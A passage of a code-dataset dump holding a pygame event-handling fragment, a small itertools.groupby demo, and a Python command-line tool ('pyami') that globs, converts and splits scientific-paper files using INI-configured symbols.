check_keydown_events(event,ship,ai_settings, screen,bullets):\n if event.key == pygame.K_RIGHT:\n ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n ship.moving_left = True\n elif event.key == pygame.K_UP:\n ship.moving_up = True\n elif event.key == pygame.K_DOWN:\n ship.moving_down = True\n elif event.key == pygame.K_SPACE:\n new_bullet = Bullet(ai_settings, screen, ship)\n bullets.add(new_bullet)\n\n\ndef collisions(enemy,bullets):\n pygame.sprite.groupcollide(enemy,bullets,True,True)\n\n\n\ndef check_keyup_events(event, ship):\n if event.key == pygame.K_RIGHT:\n ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n ship.moving_left = False\n elif event.key == pygame.K_DOWN:\n ship.moving_down = False\n elif event.key == pygame.K_UP:\n ship.moving_up = False\n\n\n\ndef check_events(ai_settings, screen, ship, bullets):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event,ship,ai_settings, screen,bullets)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n","sub_path":"0830/fff2/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"127199643","text":"import time\nfrom datetime import datetime\nfrom itertools import groupby\nfrom random import random, randint\n\n# 分组算法\n# list1 = []\n# for i in range(10):\n# list1.append({\"value\":randint(1, 20)})\n# list2 = sorted(list1, key=lambda a: a['value'])\n# print(list2)\n# for k, g in groupby(list2, key=lambda x: x['value'] // 5):\n# a = list(g)\n# print(k, a)\n# print('{}--{}:{}'.format(k * 5, (k + 1) * 5 - 1, len(a)))\n\ngroups = []\nuniquekeys = []\nlist1 = [1,2,3,4,5,6,7,8,9]\ndata1 = sorted(list1)\nprint(data1)\nfor k, g in groupby(data1, lambda x: x // 2):\n a = list(g)\n b = k\n print(list(a))\n groups.append(list(a)) # Store group iterator as a list\n uniquekeys.append(b)\n print('{}--{}:{}'.format(b * 2, (b + 1) * 2, len(a)))\nprint(groups, uniquekeys)\n\n\n# a =1604380370063\n# print(datetime.fromtimestamp(a/1000))","sub_path":"prakkkk/count_list_data.py","file_name":"count_list_data.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"147797917","text":"import logging\nimport sys\nimport os\nimport glob\nfrom file_lib import FileLib\nfrom xml_lib import XmlLib\nfrom text_lib import TextUtil\nfrom pdfreader import PdfReader\nimport pprint\n\n\nclass PyAMI:\n \"\"\" \"\"\"\n OUTFILE = \"outfile\"\n\n # flags\n APPLY = \"apply\"\n ASSERT = \"assert\"\n CHECK_URLS = \"check_urls\"\n COMBINE = \"combine\"\n CONTAINS = \"contains\"\n FILTER = \"filter\"\n GLOB = \"glob\"\n PRINT_SYMBOLS = \"print_symbols\"\n PROJ = \"proj\"\n RECURSE = \"recurse\"\n SECT = \"sect\"\n SPLIT = \"split\"\n # apply methods 1:1 input-output\n PDF2TXT = \"pdf2txt\"\n TXT2SENT = \"txt2sent\"\n XML2TXT = \"xml2txt\"\n # combine methods n:1 input-output\n CONCAT_STR = \"concat_str\"\n # split methods 1:n input-output\n TXT2PARA = \"txt2para\"\n XML2SECT = \"xml2sect\"\n # assertions\n FILE_EXISTS = \"file_exists\"\n FILE_GLOB_COUNT = \"file_glob_count\"\n # symbols to update table\n NEW_SYMBOLS = [\"proj\"]\n LOGLEVEL = \"loglevel\"\n\n logger = logging.getLogger(\"pyami\")\n def __init__(self):\n self.args = {} # args captured in here as name/value without \"-\" or \"--\"\n self.apply = []\n self.combine = None\n self.config = None\n self.current_file = None\n self.fileset = None\n self.file_dict = {}\n self.func_dict = {}\n self.result = None\n self.set_flags()\n self.symbol_ini = SymbolIni(self)\n self.set_funcs()\n self.show_symbols = False\n if self.show_symbols:\n pprint.pp(f\"SYMBOLS\\n {self.symbol_ini.symbols}\")\n\n @classmethod\n def set_logger(cls, module,\n ch_level=logging.INFO, fh_level=logging.DEBUG,\n log_file=None, logger_level=logging.WARNING):\n \"\"\"create console and stream loggers\n \n taken from https://docs.python.org/3/howto/logging-cookbook.html#logging-cookbook\n\n :param module: module to create logger for\n :param ch_level: \n :param fh_level: \n :param log_file: \n :param logger_level:\n :returns: singleton logger for module\n :rtype logger:\n\n \"\"\"\n _logger = logging.getLogger(module)\n _logger.setLevel(logger_level)\n # create file handler\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n if log_file is not None:\n fh = logging.FileHandler(log_file)\n fh.setLevel(fh_level)\n fh.setFormatter(formatter)\n _logger.addHandler(fh)\n\n # create console handler\n ch = logging.StreamHandler()\n ch.setLevel(ch_level)\n ch.setFormatter(formatter)\n _logger.addHandler(ch)\n\n _logger.debug(f\"PyAMI {_logger.level}{_logger.name}\")\n return _logger\n\n def set_flags(self):\n \"\"\" \"\"\"\n self.flag_dict = {}\n self.flag_dict[self.APPLY] = None\n self.flag_dict[self.CHECK_URLS] = None\n self.flag_dict[self.COMBINE] = None\n self.flag_dict[self.PRINT_SYMBOLS] = None\n self.flag_dict[self.RECURSE] = True\n\n def set_funcs(self):\n \"\"\" \"\"\"\n # 1:1 methods\n self.func_dict[self.XML2TXT] = XmlLib.remove_all_tags\n self.func_dict[self.PDF2TXT] = PdfReader.read_and_convert\n self.func_dict[self.TXT2SENT] = TextUtil.split_into_sentences\n # 1:n methods\n\n\n def create_arg_parser(self):\n \"\"\"creates adds the arguments for pyami commandline\"\"\"\n import argparse\n parser = argparse.ArgumentParser(description='Search sections with dictionaries and patterns')\n # apply_choices = [self.PDF2TXT, self.TXT2SENT, self.XML2TXT]\n # print(\"ch\", apply_choices)\n parser.add_argument('--apply', nargs=\"+\",\n choices=['pdf2txt','txt2sent','xml2txt'],\n help='list of sequential transformations (1:1 map) to apply to pipeline ({self.TXT2SENT} NYI)')\n parser.add_argument('--assert', nargs=\"+\",\n help='assertions; failure gives error message (prototype)')\n parser.add_argument('--combine', nargs=1,\n help='operation to combine files into final object (e.g. concat text or CSV file')\n parser.add_argument('--config', '-c', nargs=\"*\", default=\"PYAMI\",\n help='file (e.g. ~/pyami/config.ini) with list of config file(s) or config vars')\n parser.add_argument('--debug', nargs=\"+\",\n help='debugging commands , numbers, (not formalised)')\n parser.add_argument('--demo', nargs=\"*\",\n help='simple demos (NYI). empty gives list. May need downloading corpora')\n parser.add_argument('--dict', '-d', nargs=\"+\",\n help='dictionaries to ami-search with, _help gives list')\n parser.add_argument('--filter', nargs=\"+\",\n help='expression to filter with')\n parser.add_argument('--glob', '-g', nargs=\"+\",\n help='glob files; python syntax (* and ** wildcards supported); '\n 'include alternatives in {...,...}. ')\n # parser.add_argument('--help', '-h', nargs=\"?\",\n # help='output help; (NYI) an optional arg gives level')\n parser.add_argument('--languages', nargs=\"+\", default=[\"en\"],\n help='languages (NYI)')\n parser.add_argument('--loglevel', '-l', default=\"info\",\n help='log level (NYI)')\n parser.add_argument('--maxbars', nargs=\"?\", type=int, default=25,\n help='max bars on plot (NYI)')\n parser.add_argument('--nosearch', action=\"store_true\",\n help='search (NYI)')\n parser.add_argument('--outfile', type=str,\n help='output file, normally 1. but (NYI) may track multiple input dirs (NYI)')\n parser.add_argument('--patt', nargs=\"+\",\n help='patterns to search with (NYI); regex may need quoting')\n parser.add_argument('--plot', action=\"store_false\",\n help='plot params (NYI)')\n parser.add_argument('--proj', '-p', nargs=\"+\",\n help='projects to search; _help will give list')\n parser.add_argument('--sect', '-s', nargs=\"+\", # default=[AmiSection.INTRO, AmiSection.RESULTS],\n help='sections to search; _help gives all(?)')\n parser.add_argument('--split', nargs=\"+\", choices=['txt2para','xml2sect'], # split fulltext.xml,\n help='split fulltext.* into paras, sections')\n return parser\n\n def run_commands(self, arglist=None):\n \"\"\"parses cmdline, runs cmds and outputs symbols\n\n :param arglist: (Default value = None)\n\n \"\"\"\n\n self.logger.info(f\"********** raw arglist {arglist}\")\n self.parse_and_run_args(arglist)\n if self.flagged(self.PRINT_SYMBOLS):\n self.symbol_ini.print_symbols()\n\n\n def parse_and_run_args(self, arglist):\n \"\"\"runs cmds and makes substitutions (${...} then runs workflow\n\n :param arglist: \n\n \"\"\"\n if arglist is None:\n arglist = []\n parser = self.create_arg_parser()\n self.args = self.extract_parsed_arg_tuples(arglist, parser)\n self.logger.info(\"ARGS: \"+str(self.args))\n self.substitute_args()\n self.set_loglevel_from_args()\n self.run_workflows()\n\n def substitute_args(self):\n \"\"\" \"\"\"\n new_items = {}\n for item in self.args.items():\n new_item = self.make_substitutions(item)\n self.logger.debug(f\"++++++++{item} ==> {new_item}\")\n new_items[new_item[0]] = new_item[1]\n self.args = new_items\n self.logger.info(f\"******** substituted ARGS {self.args}\")\n\n def run_workflows(self):\n \"\"\" \"\"\"\n # file workflow\n self.logger.warning(f\"commandline args {self.args}\")\n if self.PROJ in self.args:\n if self.SECT in self.args or self.GLOB in self.args:\n self.run_file_workflow()\n\n\n def make_substitutions(self, item):\n \"\"\"\n\n :param item: \n\n \"\"\"\n old_val = item[1]\n key = item[0]\n new_val = None\n if old_val is None:\n new_val = None\n elif isinstance(old_val, list) and len(old_val) ==1: # single string in list\n # not sure of list, is often used when only one value\n val_item = old_val[0]\n new_val = self.symbol_ini.replace_symbols_in_arg(val_item)\n elif isinstance(old_val, list):\n new_list = []\n for val_item in old_val:\n new_v = self.symbol_ini.replace_symbols_in_arg(val_item)\n new_list.append(new_v)\n self.logger.debug(f\"UPDATED LIST ITEMS: {new_list}\")\n new_val = new_list\n elif isinstance(old_val, (int, bool, float, complex)):\n new_val = old_val\n elif isinstance(old_val, str):\n if \"${\" in old_val:\n self.logger.debug(f\"Unresolved reference : {old_val}\")\n new_val = self.symbol_ini.replace_symbols_in_arg(old_val)\n else:\n new_val = old_val\n # new_items[key] = new_val\n else:\n self.logger.error(f\"{old_val} unknown arg type {type(old_val)}\")\n new_val = old_val\n self.add_selected_keys_to_symbols_ini(key, new_val)\n return (key, new_val)\n\n def extract_parsed_arg_tuples(self, arglist, parser):\n \"\"\"\n\n :param arglist: \n :param parser: \n\n \"\"\"\n parsed_args = parser.parse_args() if not arglist else parser.parse_args(arglist)\n self.logger.info(f\"PARSED_ARGS {parsed_args}\")\n args = {}\n arg_vars = vars(parsed_args)\n new_items = {}\n for item in arg_vars.items():\n new_item = self.make_substitutions(item)\n new_items[new_item[0]] = new_item[1]\n return new_items\n\n def add_selected_keys_to_symbols_ini(self, key, value):\n \"\"\"\n\n :param key: \n :param value: \n\n \"\"\"\n if key in self.NEW_SYMBOLS:\n self.symbol_ini.symbols[key] = value\n\n def set_loglevel_from_args(self):\n \"\"\" \"\"\"\n levels = {\n \"debug\" : logging.DEBUG,\n \"info\" : logging.INFO,\n \"warning\": logging.WARNING,\n \"error\": logging.ERROR,\n }\n\n if self.LOGLEVEL in self.args:\n loglevel = self.args[self.LOGLEVEL]\n self.logger.info(f\"loglevel {loglevel}\")\n if loglevel is not None:\n loglevel = str(loglevel)\n if loglevel is not None and loglevel.lower() in levels:\n level = levels[loglevel.lower()]\n self.logger.setLevel(level)\n\n def run_file_workflow(self):\n \"\"\" \"\"\"\n import glob\n import pathlib\n import file_lib\n self.logger.info(\"globbing\")\n if not self.args[self.PROJ]:\n self.logger.error(\"requires proj\")\n return\n self.proj = self.args[self.PROJ]\n self.logger.debug(f\"ARGS {self.args}\")\n if self.args[self.GLOB]:\n self.glob_files()\n if self.args[self.SPLIT]:\n self.split(self.args.get(self.SPLIT))\n if self.args[self.APPLY]:\n self.apply_func(self.args.get(self.APPLY))\n if self.args[self.FILTER]:\n self.filter_file()\n if self.args[self.COMBINE]:\n self.combine_files_to_object()\n if self.args[self.OUTFILE]:\n self.write_output()\n if self.args[self.ASSERT]:\n self.run_assertions()\n\n def glob_files(self):\n import glob\n glob_recurse = self.flagged(self.RECURSE)\n glob_ = self.args[self.GLOB]\n self.logger.info(f\"glob: {glob_}\")\n self.file_dict = {file: None for file in glob.glob(glob_, recursive=glob_recurse)}\n self.logger.info(f\"glob file count {len(self.file_dict)}\")\n\n def split(self, type):\n \"\"\" split fulltext.xml into sections\"\"\"\n\n for file in self.file_dict:\n suffix = FileLib.get_suffix(file)\n if \".xml\" == suffix or type==self.XML2SECT:\n self.make_xml_sections(file)\n elif \".txt\" == suffix or type == self.TXT2PARA:\n self.make_text_sections(file)\n else:\n self.logger.warning(f\"no match for suffix: {suffix}\")\n\n\n def make_xml_sections(self, file):\n xml_libx = XmlLib();\n xml_libx.logger.setLevel(logging.DEBUG)\n doc = xml_libx.read(file)\n xml_libx.make_sections(\"sections\")\n\n def make_text_sections(self, file):\n sections = []\n with open(file, \"r\", encoding=\"utf-8\") as f:\n text = f.read()\n sections = TextUtil.split_at_empty_newline(text)\n self.file_dict[file] = sections\n for sect in sections:\n print(sect)\n\n\n def apply_func(self, apply_type):\n \"\"\" \"\"\"\n self.read_file_content()\n if apply_type :\n self.logger.info(f\"apply {apply_type}\")\n func = self.func_dict[apply_type]\n if (func is None):\n self.logger.error(f\"Cannot find func for {apply_type}\")\n else:\n # apply data is stored in self.file_dict\n self.apply_to_file_content(func)\n return\n\n def normalize(self, unistr):\n import unicodedata\n print(\"NYI\")\n unicodedata.normalize('NFKC', unistr)\n pass\n\n def filter_file(self):\n filter_expr = self.args[self.FILTER]\n files = set()\n # record hits\n for file in self.file_dict:\n filter_true = self.apply_filter(file, filter_expr)\n if filter_true:\n files.add(file)\n # delete hits from dict\n for file in files:\n if file in self.file_dict:\n del self.file_dict[file]\n\n def apply_filter(self, file, filter_expr):\n found = False\n with open(file, \"r\", encoding=\"utf-8\") as f:\n content = f.read()\n if filter_expr and filter_expr.startswith(self.CONTAINS):\n search_str = filter_expr[len(self.CONTAINS) + 1:-1]\n found = search_str in content\n return found\n\n def read_file_content(self, to_str=True):\n \"\"\"read file content as bytes into file_dict\n \n :to_str: if true convert content to strings\n\n :param to_str: (Default value = True)\n\n \"\"\"\n for file in self.file_dict:\n self.logger.info(f\"reading {file}\")\n if file.endswith(\".xml\"):\n self.read_string_content(file, to_str)\n elif file.endswith(\".pdf\"):\n self.lazy_read_binary_file(file)\n elif file.endswith(\".png\"):\n self.read_binary_content(file)\n elif file.endswith(\".txt\"):\n self.read_string_content(file, to_str=False)\n else:\n self.logger.warning(f\"cannot read file into string {file}\")\n\n\n def read_string_content(self, file, to_str):\n \"\"\"reads file into string\n Can process bytes to string\n\n \"\"\"\n data = None\n with open(file, \"r\", encoding=\"utf-8\") as f:\n try:\n data = f.read()\n if to_str and isinstance(data, bytes):\n data = data.decode(\"utf-8\")\n self.file_dict[file] = data\n except UnicodeDecodeError as ude:\n self.logger.error(f\"skipped decoding error {ude}\")\n return data\n\n def lazy_read_binary_file(self, file):\n self.file_dict[file] = file\n\n def read_binary_content(self, file):\n with open(file, \"rb\", ) as f:\n try:\n data = f.read()\n self.file_dict[file] = data\n except Error as e:\n self.logger.error(f\"skipped reading error {e}\")\n\n def apply_to_file_content(self, func):\n \"\"\"applies func to all string content in file_dict\n\n :param func: \n\n \"\"\"\n for file in self.file_dict:\n data = self.file_dict.get(file)\n self.logger.warning(f\"file: {file} => {type(data)} => {func}\")\n new_data = func(data)\n self.file_dict[file] = new_data\n return\n\n def combine_files_to_object(self):\n \"\"\" \"\"\"\n methods = self.args.get(self.COMBINE)\n if methods and methods == self.CONCAT_STR:\n self.result = \"\\n\".join(self.file_dict.values())\n # print(self.result)\n\n def write_output(self):\n \"\"\" \"\"\"\n self.outfile = self.args[self.OUTFILE]\n if self.result: # single output\n self.write_single_result()\n\n if self.file_dict:\n self.write_multiple_results()\n\n def write_multiple_results(self):\n for file in self.file_dict:\n data = self.file_dict[file]\n parent = FileLib.get_parent_dir(file)\n new_outfile = os.path.join(parent, self.outfile)\n if not isinstance(data, list):\n data = [data]\n with open(new_outfile, \"w\", encoding=\"utf-8\") as f:\n self.logger.warning(f\"wrote results {new_outfile}\")\n # for d in data:\n f.write(f\"{str(data)}\")\n\n def write_single_result(self):\n FileLib.force_write(self.outfile, self.result, overwrite=True)\n self.logger.warning(f\"wrote results {self.outfile}\")\n\n def run_assertions(self):\n \"\"\" \"\"\"\n assertions = self.args.get(self.ASSERT)\n if assertions is not None:\n if isinstance(assertions, str):\n assertions = [assertions]\n for assertion in assertions:\n self.run_assertion(assertion)\n\n def run_assertion(self, assertion):\n \"\"\"\n\n :param assertion: \n\n \"\"\"\n if assertion.startswith(self.FILE_EXISTS + \"(\"):\n # file_exists(file)\n file = assertion[len(self.FILE_EXISTS + \"(\"):-1]\n self.assert_file_exists(file)\n if assertion.startswith(self.FILE_GLOB_COUNT + \"(\"):\n # file_glob_count(globex,120)\n bits = assertion[len(self.FILE_GLOB_COUNT + \"(\"):-1].split(\",\")\n self.assert_glob_count(bits[0], bits[1])\n\n def assert_file_exists(self, file):\n \"\"\"\n\n :param file: \n\n \"\"\"\n if not os.path.exists(file):\n self.assert_error(f\"file {file} does not exist\")\n else:\n self.logger.info(f\"File exists: {file}\")\n pass\n\n def assert_glob_count(self, glob_, count):\n count = int(count)\n files = [file for file in glob.glob(glob_, recursive=True)]\n self.assert_equals(len(files), count)\n\n def assert_equals(self, arg1, arg2):\n if arg1 != arg2:\n raise Exception(f\"{arg1} != {arg2}\")\n\n def assert_error(self, msg):\n \"\"\"\n\n :param msg: \n\n \"\"\"\n self.logger.error(msg)\n\n def flagged(self, flag):\n \"\"\"is flag set in flag_dict\n \n if flag is in flag_dict and not falsy return true\n :flag:\n\n :param flag: \n\n \"\"\"\n return True if self.flag_dict.get(flag) else False\n\n def test_glob(self):\n \"\"\" \"\"\"\n import os\n \"\"\"\n /Users/pm286/projects/openDiagram/physchem/resources/oil26/PMC4391421/sections/0_front/1_article-meta/17_abstract.xml\n \"\"\"\n \"\"\"\n python pyami.py\\\n --glob /Users/pm286/projects/openDiagram/physchem/resources/oil26/PMC4391421/sections/0_front/1_article-meta/17_abstract.xml\\\n --proj /Users/pm286/projects/openDiagram/physchem/resources/oil26\\\n --apply xml2txt\\\n --combine concat_str\\\n --outfile /Users/pm286/projects/openDiagram/physchem/resources/oil26/files/xml_files.txt\\\n OR\n python physchem/python/pyami.py --glob '/Users/pm286/projects/openDiagram/physchem/resources/oil26/**/*abstract.xml' --proj /Users/pm286/projects/openDiagram/physchem/resources/oil26 --apply xml2txt --combine concat_str --outfile /Users/pm286/projects/openDiagram/physchem/resources/oil26/files/xml_files.txt\n MOVING TO\n python pyami.py --proj ${oil26} --glob '**/*abstract.xml' --apply xml2txt --combine to_csv --outfile ${oil26}/files/abstracts.csv\n \n \"\"\"\n self.run_commands([\n \"--proj\", \"${oil26.p}\",\n \"--glob\", \"${proj}/**/sections/**/*abstract.xml\",\n \"--dict\", \"${eo_plant.d}\", \"${ov_country.d}\",\n \"--apply\", \"xml2txt\",\n \"--combine\", \"concat_str\",\n \"--outfile\", \"${proj}/files/shweata_10.txt\",\n \"--assert\", \"file_exists(${proj}/files/xml_files.txt)\",\n ])\n\n\n# \"--config\", # defaults to config.ini,~/pyami/config.ini if omitted\n\n# on the commandline:\n# python physchem/python/pyami.py --proj '${oil26.p}' --glob '${proj}/**/sections/**/*abstract.xml' --dict '${eo_plant.d}' '${ov_country.d}' --apply xml2txt --combine concat_str --outfile '${proj}/files/shweata_1.txt'\n# whihc expands to\n# python physchem/python/pyami.py --apply xml2txt --combine concat_str --dict '/Users/pm286/projects/CEVOpen/dictionary/eoPlant/eo_plant.xml' '/Users/pm286/dictionary/openvirus20210120/country/country.xml' --glob '/Users/pm286/projects/openDiagram/physchem/resources/oil26/**/sections/**/*abstract.xml' --outfile '/Users/pm286/projects/openDiagram/physchem/resources/oil26/files/shweata_1.txt' --proj '/Users/pm286/projects/openDiagram/physchem/resources/oil26'\n\n def test_xml2sect(self):\n from shutil import copyfile\n\n proj_dir = os.path.abspath(os.path.join(__file__, \"..\", \"tst\", \"proj\"))\n assert os.path.exists(proj_dir)\n # split into sections\n self.run_commands([\n \"--proj\", proj_dir,\n \"--glob\", \"${proj}/*/fulltext.xml\",\n \"--split\", \"xml2sect\",\n \"--assert\", \"file_glob_count(${proj}/*/sections/**/*.xml,291)\"\n ])\n\n def test_split_pdf_txt_paras(self):\n self.logger.loglevel = logging.DEBUG\n\n proj_dir = os.path.abspath(os.path.join(__file__, \"..\", \"tst\", \"proj\"))\n print(\"file\", proj_dir, os.path.exists(proj_dir))\n self.run_commands([\n \"--proj\", proj_dir,\n \"--glob\", \"${proj}/*/fulltext.pd.txt\",\n \"--split\", \"txt2para\",\n \"--outfile\", \"fulltext.pd.sc.txt\",\n \"--assert\", \"file_glob_count(${proj}/*/fulltext.pd.sc.txt,291)\"\n ])\n\n def test_split_sentences(self):\n from shutil import copyfile\n self.logger.loglevel = logging.DEBUG\n\n proj_dir = os.path.abspath(os.path.join(__file__, \"..\", \"tst\", \"proj\"))\n print(\"file\", proj_dir, os.path.exists(proj_dir))\n self.run_commands([\n \"--proj\", proj_dir,\n \"--glob\", \"${proj}/*/fulltext.pd.txt\",\n # \"--apply\", \"txt2sent\",\n \"--outfile\", \"fulltext.pd.sn.txt\",\n \"--split\", \"txt2para\",\n ])\n\n def test_split_oil26(self):\n\n proj_dir = os.path.abspath(os.path.join(__file__, \"..\", \"..\", \"resources\", \"oil26\"))\n print(\"file\", proj_dir, os.path.exists(proj_dir))\n self.run_commands([\n \"--proj\", proj_dir,\n \"--glob\", \"${proj}/*/fulltext.xml\",\n \"--split\", \"xml2sect\",\n ])\n\n def test_filter(self):\n from shutil import copyfile\n\n proj_dir = os.path.abspath(os.path.join(__file__, \"..\", \"tst\", \"proj\"))\n print(\"file\", proj_dir, os.path.exists(proj_dir))\n self.run_commands([\n \"--proj\", proj_dir,\n \"--glob\", \"${proj}/**/*_p.xml\",\n \"--apply\", \"xml2txt\",\n \"--filter\", \"contains(cell)\",\n \"--combine\", \"concat_str\",\n \"--outfile\", \"cell.txt\"\n ])\n\n\n def test_pdf2txt(self):\n from shutil import copyfile\n\n proj_dir = os.path.abspath(os.path.join(__file__, \"..\", \"tst\", \"proj\"))\n assert os.path.exists(proj_dir), f\"proj_dir {proj_dir} exists\"\n self.run_commands([\n \"--proj\", proj_dir,\n \"--glob\", \"${proj}/*/fulltext.pdf\",\n \"--apply\", \"pdf2txt\",\n \"--outfile\", \"fulltext.pd.txt\",\n \"--assert\", \"file_glob_count(${proj}/*/fulltext.pd.txt,3)\"\n ])\n\n def run_tests(self):\n # self.test_glob() # also does sectioning?\n\n self.test_pdf2txt()\n self.test_split_pdf_txt_paras()\n\n # self.test_xml2sect()\n # self.test_split_oil26()\n # self.test_split_sentences()\n # self.test_xml2sect()\n # self.test_filter()\n\nclass SymbolIni:\n \"\"\"processes config/ini files and stores symbols created\"\"\"\n NS = \"${ns}\"\n PARENT = \"__parent__\" # indicates parent directory of an INI or similar file\n CONFIG = \"config\"\n PYAMI = \"PYAMI\"\n PRIMITIVES = [\"\", \"\", \"\"]\n LOGDIR = \"logs\" # maybe need to change this\n\n logger = None\n\n def __init__(self, pyami):\n FileLib.force_mkdir(self.LOGDIR)\n self.logger = PyAMI.set_logger(\n \"symbol_ini\", logger_level=logging.INFO, log_file=os.path.join(self.LOGDIR, \"symbol_ini.log\"))\n self.symbols = None\n self.pyami = pyami\n pyami.symbol_ini = self\n\n self.setup_environment()\n self.process_config_files()\n\n def process_config_files(self):\n \"\"\" \"\"\"\n # remove later\n # config file is linked as PYAMI\n self.pyami.args[self.CONFIG] = os.getenv(self.PYAMI)# \"/Users/pm286/pyami/config.ini\"\n config_files_str = self.pyami.args.get(self.CONFIG)\n config_files = [] if config_files_str is None else config_files_str.split(\",\")\n self.symbols = {}\n self.fileset = set()\n for config_file in config_files:\n self.logger.info(f\"processing config: {config_file}\")\n self.process_config_file(config_file)\n self.logger.debug(f\"symbols after config {self.symbols}\")\n\n def process_config_file(self, config_file):\n \"\"\"\n\n :param config_file: \n\n \"\"\"\n import os\n from file_lib import FileLib\n if config_file.startswith(\"${\") and config_file.endswith(\"}\"): # python config file\n file = os.environ[config_file[2:-1]]\n elif \"/\" not in config_file:\n file = os.path.join(FileLib.get_parent_dir(__file__), config_file)\n elif config_file.startswith(\"~\"): # relative to home\n home = os.path.expanduser(\"~\")\n file = home + config_file[len(\"~\"):]\n elif config_file.startswith(\"/\"): # absolute\n file = config_file\n else:\n file = None\n\n if file is not None:\n if os.path.exists(file):\n self.logger.debug(\"reading \" + file)\n self.apply_config_file(file)\n else:\n self.logger.warning(f\"*** cannot find config file {file} ***\")\n\n def apply_config_file(self, file):\n \"\"\"reads config file, recursively replaces {} symbols and '~'\n :file: python config file\n\n :param file: \n\n \"\"\"\n import configparser\n import os\n\n if file in self.fileset: # avoid cycles\n self.logger.debug(f\"{file} already in {self.fileset}\")\n return;\n else:\n self.fileset.add(file)\n\n self.config = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation())\n self.logger.info(f\"reading config file {file}\")\n files_read = self.config.read(file)\n sections = self.config.sections()\n for section in sections:\n self.convert_section_into_symbols_dict(file, section)\n\n self.check_targets_exist(file)\n self.recurse_ini_files()\n\n def check_targets_exist(self, file):\n \"\"\"\n\n :param file: \n\n \"\"\"\n for item in self.symbols.items():\n val = item[1];\n if val.startswith(\"http\"):\n if self.pyami.flagged(self.pyami.CHECK_URLS) :\n import urllib.request\n try:\n with urllib.request.urlopen(val) as response:\n html = response.read()\n except urllib.error.HTTPError as ex:\n print(f\"Cannot read {val} as url {ex}\")\n elif \"/\" in val: # assume slash means file or url\n if not os.path.exists(val): # all files\n self.logger.error(f\"{val} in {file} does not exist as file\")\n else:\n print(\"non-existent: \" + val + \" in \" + file)\n\n def setup_environment(self):\n \"\"\" \"\"\"\n for key in os.environ.keys():\n self.logger.info(f\"{key}: {os.environ[key]}\")\n\n def convert_section_into_symbols_dict(self, file, section):\n \"\"\"\n\n :param file: \n :param section: \n\n \"\"\"\n self.logger.info(\"============\" + section + \"============\" + file)\n for name in self.config[section].keys():\n if name in self.symbols:\n self.logger.debug(f\"{name} already defined, skipped\")\n else:\n raw_value = self.config[section][name]\n # make substitutions\n # we replace __file__ with parent dir of dictionary\n parent_dir = str(FileLib.get_parent_dir(file))\n if raw_value.startswith(\"~\"):\n # home directory on all OS (?)\n new_value = os.path.expanduser(\"~\") + raw_value[len(\"~\"):]\n elif raw_value.startswith(self.PARENT):\n # the prefix __file__ may have been expanded by the parser\n new_value = parent_dir + raw_value[len(self.PARENT):]\n elif raw_value.startswith(\"__file__\"):\n print(\"__file__ is obsolete \", file)\n else:\n new_value = raw_value\n\n if name.startswith(self.NS):\n name = os.environ[\"LOGNAME\"] + name[len(self.NS):]\n print(\"NAME\", name)\n\n self.symbols[name] = new_value\n\n self.logger.debug(f\"symbols for {file} {section}\\n {self.symbols}\")\n\n def recurse_ini_files(self):\n \"\"\"follows links to all *_ini files and runs them recursively\n \n does not check for cycles (yet)\n\n\n \"\"\"\n keys = list(self.symbols.keys())\n # print(\"KEYS\", keys)\n for name in keys:\n if name.endswith(\"_ini\"):\n if name not in self.symbols:\n self.logger.error(f\"PROCESSING {self.current_file} ; cannot find symbol: {name} in {self.symbols}\")\n else:\n file = self.symbols[name]\n self.apply_config_file(file)\n\n def replace_symbols(self, arg):\n \"\"\"\n\n :param arg: \n\n \"\"\"\n # print(f\"ARGLIST {type(arglist)} {arglist}\")\n if arg is None:\n return None\n elif isinstance(arg, str):\n new_arg = self.replace_symbols_in_arg(arg)\n print(f\"{arg} => {new_arg}\")\n return new_arg\n elif isinstance(arg, list):\n new_arg = []\n for item in arg:\n print(f\"SUBLIST_ITEM {item}\")\n new_item = self.replace_symbols_in_arg(item)\n new_arg.append(new_item)\n return new_arg\n elif self.is_primitive(arg):\n return arg\n else:\n print(f\"Cannot process arg {arg}\")\n return arg\n \n def is_primitive(self, arg):\n \"\"\"returns true if string of classtype is maps to int, bool, etc. Horrible\n\n :param arg: \n\n \"\"\"\n return str(type(arg)) in self.PRIMITIVES\n \n def replace_symbols_in_arg(self, arg):\n \"\"\"replaces ${foo} with value of foo if in symbols\n \n treats any included \"${\" as literals (this is probably a user error)\n\n :param arg: \n\n \"\"\"\n import re\n\n result = \"\"\n start = 0\n SYM_START = \"${\"\n SYM_END = \"}\"\n self.logger.info(f\"expanding symbols in {arg}\")\n while SYM_START in arg[start:]:\n idx0 = arg.index(SYM_START, start)\n result += arg[start:idx0]\n idx1 = arg.index(SYM_END, start)\n symbol = arg[idx0+len(SYM_START):idx1]\n replace = self.symbols.get(symbol)\n if replace != symbol:\n self.logger.debug(symbol, \" REPLACE\", replace)\n end = idx1 + 1\n result += replace if replace is not None else arg[idx0 : idx1 + len(SYM_END)]\n start = end\n result += arg[start:]\n if arg != result:\n self.logger.info(f\"expanded {arg} to {result}\")\n return result\n\n\n # return arg[2:-1] if arg.startswith(SYM_START) and arg.endswith(SYM_END) else arg\n\n def print_symbols(self):\n \"\"\" \"\"\"\n print(\"symbols>>\")\n for name in self.symbols:\n print(f\"{name}:{self.symbols[name]}\")\n\ndef main():\n \"\"\" main entry point for cmdline\n\n \"\"\"\n\n print(f\"\\n============== running pyami main ===============\\n{sys.argv[1:]}\")\n # this needs commandline\n pyami = PyAMI()\n pyami.run_tests()\n # pyami.run_commands(sys.argv[1:])\n\n\nif __name__ == \"__main__\":\n\n print(f\"sys.argv: {sys.argv}\")\n main()\n\nelse:\n\n print(\"running search main anyway\")\n 